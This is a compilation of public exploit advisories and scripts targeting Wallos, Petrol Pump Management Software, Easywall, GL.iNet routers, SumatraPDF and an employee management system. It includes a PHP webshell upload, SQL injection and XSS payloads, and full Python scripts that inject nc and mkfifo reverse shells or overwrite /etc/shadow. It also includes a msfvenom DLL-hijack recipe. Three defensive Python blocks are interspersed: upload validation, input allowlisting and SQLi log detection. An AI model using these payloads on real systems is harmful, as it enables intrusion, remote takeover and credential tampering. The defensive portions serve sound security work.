<pre><code># Exploit Title: Wallos - File Upload RCE (Authenticated)<br /># Date: 2024-03-04<br /># Exploit Author: sml@lacashita.com<br /># Vendor Homepage: https://github.com/ellite/Wallos<br /># Software Link: https://github.com/ellite/Wallos<br /># Version: < 1.11.2<br /># Tested on: Debian 12<br /><br />Wallos allows you to upload an image/logo when you create a new subscription.<br />This can be bypassed to upload a malicious .php file.<br /><br />POC<br />---<br /><br />1) Log into the application.<br />2) Go to "New Subscription"<br />3) Upload Logo and choose your webshell .php<br />4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:<br /><br />--- SNIP -----------------<br /><br />POST /endpoints/subscription/add.php HTTP/1.1<br /><br />Host: 192.168.1.44<br /><br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br /><br />Accept: */*<br /><br />Accept-Language: en-US,en;q=0.5<br /><br />Accept-Encoding: gzip, deflate<br /><br />Referer: http://192.168.1.44/<br /><br />Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324<br /><br />Origin: http://192.168.1.44<br /><br />Content-Length: 7220<br /><br />Connection: close<br /><br />Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light<br /><br />-----------------------------29251442139477260933920738324<br /><br />Content-Disposition: form-data; name="name"<br /><br />test<br /><br />-----------------------------29251442139477260933920738324<br /><br />Content-Disposition: form-data; name="logo"; filename="revshell.php"<br /><br />Content-Type: image/jpeg<br /><br />GIF89a;<br /><br /><?php<br />system($_GET['cmd']);<br />?> <br /><br />-----------------------------29251442139477260933920738324<br /><br />Content-Disposition: form-data; name="logo-url"<br /><br />----- SNIP -----<br /><br />5) You will get the response that your file was uploaded 
ok:<br /><br />{"status":"Success","message":"Subscription updated successfully"}<br /><br /><br />6) Your file will be located in: <br />http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php<br /><br /></code></pre>
<pre><code># Exploit Title: File Upload Remote Code Execution (RCE) in Petrol Pump Management Software v.1.0<br /># Date: 01-03-2024<br /># Exploit Author: Shubham Pandey<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /># CVE : CVE-2024-27747<br /># Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email Image parameter in the profile.php component.<br /># POC:<br />1. Here we go to: http://localhost/fuelflow/index.php<br />2. Now login with default username=mayuri.infospace@gmail.com and Password=admin<br />3. Now go to "http://localhost/fuelflow/admin/profile.php"<br />4. Upload the phpinfo.php file in the "Image" field<br />5. Phpinfo will be present in the "http://localhost/fuelflow/assets/images/phpinfo.php" page<br />6. The content of the phpinfo.php file is given below:<br /><?php phpinfo();?><br /># Reference:<br />https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.md<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27747<br /></code></pre>
<pre><code># Exploit Title: SQL Injection vulnerability in Petrol Pump Management Software v.1.0<br /># Date: 01-03-2024<br /># Exploit Author: Shubham Pandey<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /># CVE : CVE-2024-27746<br /># Description: SQL Injection vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the email address parameter in the index.php component.<br /># POC:<br />1. Here we go to: http://localhost/fuelflow/index.php<br />2. Now login with username: test@test.com';SELECT SLEEP(10)# and Password=test<br />3. The page will take 10 seconds to load because of the time-based SQL injection<br /># Reference:<br />https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.md<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746<br /></code></pre>
<pre><code># Exploit Title: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0<br /># Date: 01-03-2024<br /># Exploit Author: Shubham Pandey<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /># CVE : CVE-2024-27743<br /># Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the Address parameter in the add_invoices.php component.<br /># POC:<br />1. Here we go to: http://localhost/fuelflow/index.php<br />2. Now login with default username=mayuri.infospace@gmail.com and Password=admin<br />3. Now go to "http://localhost/fuelflow/admin/add_invoices.php"<br />4. Fill the payload "<script>alert(0)</script>" in the "Address" field<br />5. Stored XSS will be present in the "http://localhost/fuelflow/admin/manage_invoices.php" page<br /># Reference:<br />https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27743.md<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27743<br /><br /><br />-----<br /><br /># Exploit Title: Cross Site Scripting vulnerability via SVG in Petrol Pump Management Software v.1.0<br /># Date: 01-03-2024<br /># Exploit Author: Shubham Pandey<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows, Linux<br /># CVE : CVE-2024-27744<br /># Description: Cross Site Scripting vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the image parameter in the profile.php component.<br /># POC:<br />1. Here we go to: http://localhost/fuelflow/index.php<br />2. Now login with default username=mayuri.infospace@gmail.com and Password=admin<br />3. Now go to "http://localhost/fuelflow/admin/profile.php"<br />4. Upload the xss.svg file in the "Image" field<br />5. Stored XSS will be present in the "http://localhost/fuelflow/assets/images/xss.svg" page<br />6. The content of the xss.svg file is given below:<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br />  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br />  <script type="text/javascript"><br />    alert("XSS by Shubham Pandey");<br />  </script><br /></svg><br /># Reference:<br />https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27744.md<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27744<br /></code></pre>
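One server-side check that would refuse all three uploads described above (the Wallos .php sent as image/jpeg with a GIF89a prefix, the Petrol Pump phpinfo.php, and the scripted xss.svg), as an added example; this is not code from Wallos or from the Petrol Pump Management Software. The extension allowlist, the sample inputs and all function names are assumptions.

```python
import os
import re
import secrets
import xml.etree.ElementTree as ET

# Allowed extension -> bytes the file must start with. The client's Content-Type is
# never consulted: the Wallos request above sets it to image/jpeg on a .php file.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.IGNORECASE)


def svg_is_passive(data: bytes) -> bool:
    """True only for SVG with no script element, no on* handler and no javascript:
    URL; anything that fails to parse is rejected. Production code should parse
    with defusedxml instead so entity-expansion bombs are refused as well."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return False
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()          # strip the namespace
        if local in ("script", "foreignobject"):
            return False
        for name, value in el.attrib.items():
            if EVENT_ATTR.match(name.rsplit("}", 1)[-1]):
                return False
            if "javascript:" in value.replace(" ", "").lower():
                return False
    return True


def validate_upload(filename: str, content_type: str, data: bytes):
    """Decide from the (untrusted) filename extension and the bytes alone.
    Returns (accepted, reason)."""
    del content_type                                     # attacker-controlled, ignored
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext == ".svg":
        return (True, "ok") if svg_is_passive(data) else (False, "active svg")
    if ext not in MAGIC:                                 # .php, .phtml, .phar, ...
        return False, "extension not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # A GIF89a-prefixed PHP polyglot named .gif still passes here. That is only
    # harmless because uploads are stored under a random name (below) in a
    # directory where the web server has no script handler enabled.
    return True, "ok"


def stored_name(ext: str) -> str:
    """Random server-side name carrying only the validated extension, so a
    double extension such as shell.php.jpg never reaches disk."""
    return secrets.token_hex(16) + ext


# Constructed samples modelled on the advisories above.
GIF89A_POLYGLOT = b"GIF89a;\n<?php phpinfo(); ?>\n"      # Wallos shape, phpinfo body
PHPINFO = b"<?php phpinfo();?>"                            # Petrol Pump upload
SVG_SCRIPTED = (b'<?xml version="1.0" standalone="no"?>\n'
                b'<svg version="1.1" xmlns="http://www.w3.org/2000/svg">\n'
                b'<polygon points="0,0 0,50 50,0" fill="#009900"/>\n'
                b'<script type="text/javascript">alert("XSS");</script></svg>')
SVG_CLEAN = (b'<svg xmlns="http://www.w3.org/2000/svg">'
             b'<polygon points="0,0 0,50 50,0" fill="#009900"/></svg>')
```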
<pre><code># Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
# Date: 30-11-2023
# Exploit Author: Melvin Mejia
# Vendor Homepage: https://jpylypiw.github.io/easywall/
# Software Link: https://github.com/jpylypiw/easywall
# Version: 0.3.1
# Tested on: Ubuntu 22.04

import requests, urllib3
urllib3.disable_warnings()

def exploit():

    # Replace values needed here
    target_host = "192.168.1.25"
    target_port = "12227"
    lhost = "192.168.1.10"
    lport = "9001"
    user = "admin"
    password = "admin"

    target = f"https://{target_host}:{target_port}"

    # Authenticate to the app
    print("[+] Attempting login with the provided credentials...")
    login_data = {"username": user, "password": password}
    session = requests.session()
    try:
        login = session.post(f'{target}/login', data=login_data, verify=False)
    except Exception as ex:
        print("[!] There was a problem connecting to the app, error:", ex)
        exit(1)

    if login.status_code != 200:
        print("[!] Login failed.")
        exit(1)
    else:
        print("[+] Login successful.")

    # Send the payload, the port parameter suffers from a command injection vulnerability
    print("[+] Attempting to send payload.")
    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
    data = {"port": f"123;{rev_shell}", "description": "", "tcpudp": "tcp"}
    send_payload = session.post(f"{target}/ports-save", data=data, verify=False)
    if send_payload.status_code != 200:
        print("[!] Failed to send payload.")
        exit(1)
    else:
        print("[+] Payload sent.")

    # Trigger the execution of the payload
    print("[+] Attempting execution.")
    data = {"step_1": "", "step_2": ""}
    execute = session.post(f"{target}/apply-save", data=data, verify=False)
    if execute.status_code != 200:
        print("[!] Attempt to execute failed.")
        exit(1)
    else:
        print(f"[+] Execution succeeded, you should have gotten a shell at {lhost}:{lport}.")

exploit()
</code></pre>
<pre><code>#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 3.216 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/v1/openwrt-ar300m-3.216-0321-1679391449.tar
# Version: 3.216
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46456

import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def generate_random_string():
    return ''.join([chr(randint(97, 122)) for x in range(6)])

def add_config_file(url, auth_token, payload):
    data = {'file': ('{}'.format(payload), 'client\ndev tun\nproto udp\nremote 127.0.0.1 1194\nscript-security 2')}
    try:
        r = requests.post(url, files=data, headers={'Authorization':auth_token}, verify=False)
        r.raise_for_status()
    except requests.exceptions.RequestException:
        print('[X] Error while adding configuration file')
        return False
    return True

def verify_config_file(url, auth_token, payload):
    try:
        r = requests.get(url, headers={'Authorization':auth_token}, verify=False)
        r.raise_for_status()
        if not r.json()['passed'] and payload not in r.json()['passed']:
            return False
    except requests.exceptions.RequestException:
        print('[X] Error while verifying the upload of configuration file')
        return False
    return True

def add_client(url, auth_token):
    postdata = {'description':'RCE_client_{}'.format(generate_random_string())}
    try:
        r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)
        r.raise_for_status()
    except requests.exceptions.RequestException:
        print('[X] Error while adding OpenVPN client')
        return False
    return True

def get_client_id(url, auth_token, payload):
    try:
        r = requests.get(url, headers={'Authorization':auth_token}, verify=False)
        r.raise_for_status()
        for conn in r.json()['clients']:
            if conn['defaultserver'] == payload:
                return conn['id']
        print('[X] Error: could not find client ID')
        return False
    except requests.exceptions.RequestException:
        print('[X] Error while retrieving added OpenVPN client ID')
        return False

def connect_vpn(url, auth_token, client_id):
    sleep(0.25)
    postdata = {'ovpnclientid':client_id, 'enableovpn':'true', 'force_client':'false'}
    r = requests.post(url, data=postdata, headers={'Authorization':auth_token}, verify=False)

def cleanup(url, auth_token, client_id):
    try:
        r = requests.post(url, data={'clientid':client_id}, headers={'Authorization':auth_token}, verify=False)
        r.raise_for_status()
    except requests.exceptions.RequestException:
        print('[X] Error while cleaning up OpenVPN client')
        return False
    return True

def get_command_response(s):
    res = ''
    while True:
        try:
            resp = s.recv(1).decode('utf-8')
            res += resp
        except UnicodeDecodeError:
            pass
        except socket.timeout:
            break
    return res

def revshell_listen(revshell_ip, revshell_port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)

    try:
        s.bind((revshell_ip, int(revshell_port)))
        s.listen(1)
    except Exception as e:
        print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
        exit(1)

    try:
        clsock, claddr = s.accept()
        clsock.settimeout(2)
        if clsock:
            print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
            res = ''
            while True:
                command = input('$ ')
                clsock.sendall('{}\n'.format(command).encode('utf-8'))
                stdout.write(get_command_response(clsock))

    except socket.timeout:
        print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
        s.close()

    except KeyboardInterrupt:
        print('\n[*] Closing connection')
        try:
            clsock.close()
        except socket.error:
            pass
        except NameError:
            pass
        s.close()

def main(base_url, auth_token, revshell_ip, revshell_port):
    print('[+] Started GL.iNet <= 3.216 OpenVPN client config filename RCE exploit')

    payload = '$(busybox nc {} {} -e sh).ovpn'.format(revshell_ip, revshell_port)
    print('[+] Filename payload: "{}"'.format(payload))

    print('[*] Uploading crafted OpenVPN config file')
    if not add_config_file(base_url+'/api/ovpn/client/upload', auth_token, payload):
        exit(1)

    if not verify_config_file(base_url+'/cgi-bin/api/ovpn/client/uploadcheck', auth_token, payload):
        exit(1)
    print('[+] File uploaded successfully')

    print('[*] Adding OpenVPN client')
    if not add_client(base_url+'/cgi-bin/api/ovpn/client/addnew', auth_token):
        exit(1)

    client_id = get_client_id(base_url+'/cgi-bin/api/ovpn/client/list', auth_token, payload)
    if not client_id:
        exit(1)
    print('[+] Client ID: ' + client_id)

    print('[*] Triggering connection to created OpenVPN client')
    Thread(target=connect_vpn, args=(base_url+'/cgi-bin/api/ovpn/client/set', auth_token, client_id)).start()

    print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
    revshell_listen(revshell_ip, revshell_port)

    print('[*] Clean-up by removing OpenVPN connection')
    if not cleanup(base_url+'/cgi-bin/api/ovpn/client/remove', auth_token, client_id):
        exit(1)

    print('[+] Done')

if __name__ == '__main__':
    if len(argv) < 5:
        print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
        exit(1)

    main(argv[1], argv[2], argv[3], argv[4])
</code></pre>
<pre><code>#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46454

import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def trigger_revshell(url, auth_token, payload):
    sleep(0.25)
    data = {
        'jsonrpc': '2.0',
        'id': randint(1000, 9999),
        'method': 'call',
        'params': [
            auth_token,
            'plugins',
            'get_package_info',
            {'name': 'bas{}e-files'.format(payload)}
        ]
    }
    requests.post(url, json=data, verify=False)

def get_command_response(s):
    res = ''
    while True:
        try:
            resp = s.recv(1).decode('utf-8')
            res += resp
        except UnicodeDecodeError:
            pass
        except socket.timeout:
            break
    return res

def revshell_listen(revshell_ip, revshell_port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)

    try:
        s.bind((revshell_ip, int(revshell_port)))
        s.listen(1)
    except Exception as e:
        print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
        exit(1)

    try:
        clsock, claddr = s.accept()
        clsock.settimeout(2)
        if clsock:
            print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
            res = ''
            while True:
                command = input('$ ')
                clsock.sendall('{}\n'.format(command).encode('utf-8'))
                stdout.write(get_command_response(clsock))

    except socket.timeout:
        print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
        s.close()

    except KeyboardInterrupt:
        print('\n[*] Closing connection')
        try:
            clsock.close()
        except socket.error:
            pass
        except NameError:
            pass
        s.close()

def main(base_url, auth_token, revshell_ip, revshell_port):
    print('[+] Started GL.iNet <= 4.3.7 RCE exploit')

    payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
    print('[+] Reverse shell payload: "{}"'.format(payload))

    print('[*] Triggering reverse shell connection')
    Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()

    print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
    revshell_listen(revshell_ip, revshell_port)

    print('[+] Done')

if __name__ == '__main__':
    if len(argv) < 5:
        print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
        exit(1)

    main(argv[1], argv[2], argv[3], argv[4])
</code></pre>
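The Easywall and both GL.iNet exploits above work because a web parameter (a port, an OpenVPN config filename, a package name) is pasted into a shell command line. Added example, not Easywall or GL.iNet code: per-field allowlist validation plus argv-style process invocation, with constructed inputs in which `id` stands in for the advisories' payloads; the regexes and function names are assumptions.

```python
import re
import shlex
import subprocess
import sys

# [0-9] rather than \d: \d also matches non-ASCII digits that int() accepts.
PORT_RE = re.compile(r"[0-9]{1,5}")
OVPN_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}\.ovpn")
PKG_NAME_RE = re.compile(r"[a-z0-9][a-z0-9+._-]{0,127}")     # opkg-style names


def validate_port(value: str):
    """Only a plain decimal number in 1..65535; '123;id' never reaches int()."""
    if not PORT_RE.fullmatch(value):
        return None
    port = int(value)
    return port if 1 <= port <= 65535 else None


def validate_ovpn_name(value: str):
    """Config filename: letters, digits, '_', '.', '-' and a fixed .ovpn suffix."""
    return value if OVPN_NAME_RE.fullmatch(value) else None


def validate_pkg_name(value: str):
    """Package name: no quoting, substitution or whitespace characters at all."""
    return value if PKG_NAME_RE.fullmatch(value) else None


def argv_passthrough(value: str) -> str:
    """Hand the value to a child as one argv element. No shell runs, so the
    child receives '$(id).ovpn' as those ten characters and nothing executes."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def shell_literal(value: str) -> str:
    """If a shell string is unavoidable, shlex.quote single-quotes the value so
    $(...), ; and # are literal. Validate first; quoting is the last resort."""
    return shlex.quote(value)


# Constructed inputs shaped like the three advisories' injection points.
INJECTION_SAMPLES = {
    "easywall port": "123;id",
    "gl.inet 3.x ovpn filename": "$(id).ovpn",
    "gl.inet 4.x package name": "bas$(id)e-files",
}
VALIDATORS = {
    "easywall port": validate_port,
    "gl.inet 3.x ovpn filename": validate_ovpn_name,
    "gl.inet 4.x package name": validate_pkg_name,
}


def triage(samples: dict) -> dict:
    """Map each sample to True (accepted) or False (rejected) by its field's validator."""
    return {label: VALIDATORS[label](value) is not None for label, value in samples.items()}
```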
<pre><code>#!/usr/bin/env python3

# Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46455

import crypt  # removed from the standard library in Python 3.13; run under 3.12 or earlier
import requests
from sys import argv

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def craft_shadow_file(salted_password):
    shadow_content = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)
    shadow_content += 'daemon:*:0:0:99999:7:::\n'
    shadow_content += 'ftp:*:0:0:99999:7:::\n'
    shadow_content += 'network:*:0:0:99999:7:::\n'
    shadow_content += 'nobody:*:0:0:99999:7:::\n'
    shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'
    shadow_content += 'stubby:x:0:0:99999:7:::\n'
    shadow_content += 'ntp:x:0:0:99999:7::\n'
    shadow_content += 'mosquitto:x:0:0:99999:7::\n'
    shadow_content += 'logd:x:0:0:99999:7::\n'
    shadow_content += 'ubus:x:0:0:99999:7::\n'
    return shadow_content

def replace_shadow_file(url, auth_token, shadow_content):
    data = {
        'sid': (None, auth_token),
        'size': (None, '4'),
        'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),
        'file': ('shadow', shadow_content)
    }
    requests.post(url, files=data, verify=False)

def main(base_url, auth_token):
    print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')

    password = input('[?] New password for root user: ')
    salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)

    shadow_content = craft_shadow_file(salted_password)
    print('[+] Crafted shadow file:\n{}'.format(shadow_content))

    print('[*] Replacing shadow file with the crafted one')
    replace_shadow_file(base_url+'/upload', auth_token, shadow_content)

    print('[+] Done')

if __name__ == '__main__':
    if len(argv) < 3:
        print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))
        exit(1)

    main(argv[1], argv[2])
</code></pre>
<pre><code>SumatraPDF 3.5.2 DLL Hijack<br /><br /># Exploit Title: Sumatra PDF 3.5.2 DLL Hijack<br /># Date: 03.03.2024<br /># Exploit Author: Krishna Vamshi Katta Rokkaiah<br /># Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader<br /># Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer<br /># Version: 3.5.2<br /># Tested on: Windows 11<br /># CVE : CVE-2024-25884<br /><br />Description:<br />In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.<br /><br />Proof of Concept:<br /><br />1. Use MSFVenom to create a malicious DLL:<br />msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL<br /><br />2. Copy this file to the Sumatra PDF installation folder:<br />C:\Users\<username>\AppData\Local\SumatraPDF\<br /><br />3. Start a listener in attacking system:<br />nc -nlvp 7777<br /><br />4. Start the Sumatra PDF application and notice a reverse shell in the attacking system.<br /><br />Demo:<br />https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view<br /></code></pre>
<pre><code>## Title: employee_akpoly-management-system-1.0-2024 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03/01/2024<br />## Vendor: https://www.sourcecodester.com/users/walterjnr1<br />## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />Potential SQLi detected in password parameter. Please confirm it<br />manually... The payload from the puncher_SQLi_bypass_authentication<br />module was submitted successfully after the test. You must test<br />manually to confirm this vulnerability! By using this vulnerability<br />the attacker<br />can get control against an admin account and even more bad things!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: txtpassword (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT<br />2215=2215# TKHd&btnlogin=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT<br />2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT<br />(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT<br />3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)<br /><br />## Time 
spent:<br />00:35:00<br /><br /><br /></code></pre>
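The login payload from the Petrol Pump SQL injection advisory (CVE-2024-27746) and the three sqlmap techniques reported for the employee management system above leave recognisable traces in request logs. Added example, not from either advisory: detection logic run over constructed log lines carrying those payloads; the log format (client, request, status, raw POST body, server time in ms), the thresholds and the technique names are assumptions.

```python
import re
from urllib.parse import parse_qs

LINE_RE = re.compile(r'^(\S+) "(\w+) (\S+)" (\d{3}) "([^"]*)" (\d+)$')

# Each pattern is applied to the URL-decoded value of every POST parameter.
SIGNATURES = {
    "stacked-query": re.compile(r"'\s*;\s*(?:SELECT|INSERT|UPDATE|DELETE|DROP)\b", re.I),
    "boolean-blind": re.compile(r"'\s*(?:OR|AND)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),
}
SLEEP_RE = re.compile(r"\bSLEEP\s*\(\s*(\d+)\s*\)", re.I)

# Constructed lines: the first four carry the advisories' payloads, the last is benign.
SAMPLE_LOG = [
    '10.0.0.5 "POST /fuelflow/index.php" 200 "email=test%40test.com%27%3BSELECT+SLEEP%2810%29%23&password=test" 10041',
    '10.0.0.5 "POST /login.php" 200 "txtusername=WKFNZjdP&txtpassword=y6Q%21i4e%21W6%27+OR+NOT+2215%3D2215%23+TKHd&btnlogin=" 12',
    '10.0.0.5 "POST /login.php" 200 "txtusername=WKFNZjdP&txtpassword=y6Q%21i4e%21W6%27+OR+%28SELECT+2145+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x717a717071%2C%28SELECT+%28ELT%282145%3D2145%2C1%29%29%29%2C0x716a787171%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%23+JjHm&btnlogin=" 15',
    '10.0.0.5 "POST /login.php" 200 "txtusername=WKFNZjdP&txtpassword=y6Q%21i4e%21W6%27+AND+%28SELECT+3563+FROM+%28SELECT%28SLEEP%287%29%29%29nLaZ%29%23+ZzRM&btnlogin=" 7015',
    '10.0.0.9 "POST /login.php" 200 "txtusername=alice&txtpassword=Summer%2724%21&btnlogin=" 9',
]


def analyze_line(line: str):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, method, path, status, body, duration = m.groups()
    duration_ms = int(duration)
    hits = {}
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            found = [name for name, rx in SIGNATURES.items() if rx.search(value)]
            sleep = SLEEP_RE.search(value)
            if sleep:
                found.append("time-based")
                # A SLEEP(n) probe whose response took at least n seconds is
                # evidence the statement ran, not merely that it was submitted.
                if duration_ms >= int(sleep.group(1)) * 1000:
                    found.append("time-based-confirmed")
            if found:
                hits[param] = found
    if not hits:
        return None
    techniques = sorted({t for names in hits.values() for t in names})
    return {"client": client, "method": method, "path": path, "status": int(status),
            "duration_ms": duration_ms, "params": hits, "techniques": techniques}


def scan(lines):
    """Findings for every suspicious line, in log order."""
    return [f for f in (analyze_line(l) for l in lines) if f]
```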